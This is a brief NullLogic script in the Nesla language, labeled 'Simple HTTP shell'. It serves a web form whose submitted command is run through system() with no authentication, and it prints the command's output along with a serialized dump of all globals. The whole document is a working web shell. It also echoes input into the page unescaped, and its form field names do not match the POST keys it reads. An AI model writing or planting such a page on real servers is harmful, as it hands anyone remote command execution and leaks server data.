NullLogic

...

#!/usr/bin/nsp if (typeof(_SERVER)!='table') { global _SERVER = { REQUEST_METHOD="GET", PATH_INFO="/nesla/blah" }; } // this is a debug block if (string.cmp(_SERVER['REQUEST_METHOD'], "POST")==0) { var path=_POST['PATH']; var command=_POST['COMMAND']; } else { var path=_filepath; var command="ps auxw"; } print( "<HTML>\n", "<TITLE>Simple HTTP shell</TITLE>\n", "<HEAD>\n", "<STYLE TYPE=text/css>\n", "A { color: #0000FF; text-decoration: none; }\n", "A:HOVER { background-color: #E0E0FF; }\n", "</STYLE>\n", "</HEAD>\n", "<BODY>\n", "<CENTER>\n", "<FORM ACTION='", _SERVER['PATH_INFO'], "' METHOD='POST' NAME='shell'>\n", "<TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0 BGCOLOR='#E0E0E0'>\n", "<TR><TD>Path </TD><TD><INPUT SIZE=50 NAME='path' VALUE='", path, "'></TD></TR>\n", "<TR><TD>Command</TD><TD><INPUT SIZE=50 NAME='command' VALUE='", command, "'></TD></TR>\n", "<TR><TD ALIGN=CENTER COLSPAN=2><input type='submit' value='go' name='submit'></TD></TR>\n", "</TABLE>\n", "</FORM>\n", "</CENTER>\n" ); print("<FORM NAME=\"psout\"><TEXTAREA WRAP=PHYSICAL NAME=details ROWS=25 COLS=80 style='width:100%'>\n"); system(command); print("</TEXTAREA></FORM>"); print( "<SCRIPT LANGUAGE=\"JavaScript\" TYPE=\"text/javascript\">\n", "function showdebug() {\n", " if (document.getElementById('debug').style.display=='none') {\n", " document.getElementById('debug').style.display='block';\n", " } else {\n", " document.getElementById('debug').style.display='none';\n", " }\n", "}\n", "document.shell.command.focus();\n", "</SCRIPT>\n" ); print("<A HREF=javascript:showdebug()>DEBUG</A>\n"); print("</CENTER>\n"); print("<DIV ID=debug STYLE='display:none'><PRE><FONT SIZE=2>\n"); print(serialize(_GLOBALS)); print("</FONT></PRE></DIV>\n"); print("</BODY>\n</HTML>\n");